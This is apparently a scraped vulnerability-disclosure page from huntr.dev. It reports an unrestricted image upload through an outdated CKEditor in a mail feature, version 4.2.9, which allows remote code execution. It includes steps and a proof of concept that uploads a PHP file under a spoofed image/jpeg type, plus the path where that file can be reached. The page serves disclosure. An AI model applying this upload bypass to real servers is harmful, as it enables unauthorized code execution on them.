Lucene search

K
huntrAmethamaBE6616EB-384D-40D6-B1FD-0EC9E4973F12
HistoryJun 28, 2023 - 5:00 p.m.

Vulnerable CKEditor used on version 4.2.9

2023-06-2817:00:05
amethama
www.huntr.dev
77
ckeditor
remote code execution
image upload

EPSS

0.001

Percentile

36.8%

Description

When attaching image on mail feature, the upload using ckeditor vulnerable version that lead to RCE.

Proof of Concept

  1. Go to messages,
  2. Write email
  3. add image
  4. Upload the php file.
  5. access the uploaded php file in /adm_my_files/mail/images/

// PoC.js

Content-Disposition: form-data; name=“upload”; filename=“aaa.test.php”
Content-Type: image/jpeg

<?php
phpinfo();
?>

EPSS

0.001

Percentile

36.8%

Related for BE6616EB-384D-40D6-B1FD-0EC9E4973F12